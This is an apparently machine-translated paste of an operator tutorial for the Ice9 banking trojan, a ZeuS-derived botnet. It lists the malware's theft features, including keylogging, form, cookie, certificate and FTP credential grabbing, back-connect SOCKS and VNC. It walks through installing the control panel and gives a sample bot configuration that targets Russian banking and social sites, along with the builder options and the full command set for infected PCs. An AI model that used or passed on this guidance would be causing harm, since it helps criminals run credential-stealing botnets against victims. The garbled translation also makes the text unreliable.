ICE9 TUTORIAL

SUBMITTED BY: Guest

DATE: Oct. 29, 2013, 4:23 p.m.

FORMAT: Text only

SIZE: 6.7 kB

Raw Download

HITS: 1012

Report
  1. ================================================== ==================
  2. BRIEF DESCRIPTION OF THE
  3. ================================================== ==================
  5. Ice9 new bot formgrabber like ZeuS.
  6. Was based on second line version of ZeuS and was redesigned and improved quality.
  7. The main task was to increase relative to its progenitor otstuka and the task was successfully accomplished.
  8. Improved round proactive protection and firewalls.
  9. The same treatment was subjected to injection technology allows injection produce work much more stable.
  10. Boat is constantly evolving and updated.
  12. ================================================== ==================
  13. FUNCTIONAL
  14. ================================================== ==================
  16. Keylogging
  17. -Grabbing http and https form data, and inject its code into Internet Explorer and browsers on its engine (AOL, Maxton, etc.), Mozilla FireFox
  18. -Grabbing cookies. Sol files and saved form data
  19. -Grabing-FTP clients: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1,2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP
  20. -Grabbing Windows Mail, Live Mail, outlook
  21. -Socks-with the possibility of backconnect
  22. Screenshots in real time as well as the ability to set response when viewing a particular URL
  23. -Obtain certificates from the repository "MY" (certificates marked "Do not exportable" is not exported correctly), and its treatment.
  24. After that, any imported certificate will be stored on the server.
  25. -Sniffer for TCP traffic
  26. -Wide range of commands to control the infected PCs
  27. -VNC module
  29. ================================================== ==================
  30. PROCEDURE
  31. ================================================== ==================
  32. The installation procedure consists of 2 parts:
  34. a) To install the server part (control panel, bot)
  36. b) the configuration of the bot
  38. -Installing the server side:
  40. Fill the folder with the server to the server and set the directory system CHMOD 777
  41. Create a MySQL database
  42. Run the script install / index.php in the folder with the server to the server-drenched and follow the online instructions
  44. Note: need to have the php module mb_strings
  47. -Configuration procedure bot:
  49. Boat has a configuration file settings.txt where all the necessary settings for it to work.
  50. The settings file is divided into several sections: Settings (basic settings)
  54. {"Settings"
  55. ; Path to self-bot (bot download this EXE if newer config version was created and trying to self-update)
  56. autoupdate_path "http://localhost/bot.exe"
  57. ; Gate Way to the admin (the path through which the bot passes the information to the Control Panel)
  58. receiving_script_path "http://localhost/script.php"
  59. ; File name with injects
  60. injects_file "injects.txt"
  61. ; Data filters grabbing (the format is fully compatible with the format of Zeus)
  62. {"DataGrabFilters"
  63. ; "Http://mail.rambler.ru/ *" "passw; login"
  64. }
  65. ; Fake hidden URI redirect (format is fully compatible with the format of Zeus)
  66. {"URLRedirects"
  67. ; "Http://www.rambler.ru" "http://www.yandex.ru" "GP" "" ""
  68. }
  69. ; Ways to backup config files (in case of unavailability of the main config the bot will attempt to download and use the backup configuration file)
  70. {"MirrorServers"
  71. "Http://advdomain/cfg1.bin"
  72. }
  73. ; URI mask
  74. {"URLMasks"
  75. "Nhttp: / / * odnoklassniki.ru / *"
  76. "Nhttp: / / vkontakte.ru / *"
  77. "S * / login.osmp.ru / *"
  78. "S * / atl.osmp.ru / *"
  79. }
  80. }
  82. The list of available masks URI:
  84. N - do not write data in reports
  85. S - make screenshot with mouse clicks on the page area matches the URI of the mask
  86. C - the preservation of all cookies associated with that URI and blocking access to it
  87. B - blocking access to the URI
  90. ================================================== ==================
  91. DESCRIPTION OF WORK Builder
  92. ================================================== ==================
  94. - Creating a bot: (not available for tethered to the host version)
  96. Setting's path - the path to the configuration file
  97. Botnet's name - the name of a botnet
  98. Settings retrieve timeout - intrerval between bot download settings from the server
  99. Statistics retrieve timeout - intrerval between the sending of reports to the server
  100. RC4 encryption key - the encryption key (must match the key in the admin)
  101. Remove certificate - Remove certificates when establishing a bot
  102. Disable TCP - disable TCP-server (socks server, the screenshots in real time) - increases the concealment
  105. - Create a configuration file:
  107. RC4 encryption key - the encryption key (must match the key in the admin)
  108. Settings file - the path to configuration file
  111. - Find and remove the bot from the system:
  112. Enter the RC4 encryption key at the bottom of the window.
  113. If your system features a bot with the same key is the delete button will be available.
  116. ================================================== ==================
  117. A list of commands the bot (team prescribed in section admin scripts)
  118. ================================================== ==================
  120. Working with the OS.
  122. os_shutdown - Shut down the computer
  123. os_reboot - Reboot the computer
  126. Working with a bot.
  128. bot_uninstall - Unload boat from the computer
  129. bot_update [url] - Scan bot
  130. bot_update_exe [url] - Update the bot
  131. bot_bc_add [service] [ip] [port] - Create a back-Connect connection with the bot
  132. bot_bc_remove [service] [ip] [port] - Remove back-soednenie connection with the bot
  133. bot_httpinject_disable [url_mask] - Turn off injection produce a bot
  134. bot_httpinject_enable [url_mask] - Add a performance injection produce a bot
  137. Working with the user.
  139. user_destroy - Kill Operatio System of bot
  140. user_logoff - Terminate a user session bot
  141. user_execute [url] - Run the executable file on your computer, this command has updated the bot exe
  142. user_cookies_get - Get a cookie from your computer bot
  143. user_cookies_remove - Remove the cookies from your computer bot
  144. user_certs_get - Get a certificate from a computer bot
  145. user_certs_remove - Delete certificate from a computer bot
  146. user_url_block [url_mask] - Block URL
  147. user_url_unblock [url_mask] - Unblock URL
  148. user_homepage_set [url] - Set the URL as a homepage bot
  149. user_flashplayer_get - Get SOL files from a computer bot
  150. user_flashplayer_remove - SOL Delete files from computer bot
comments powered by Disqus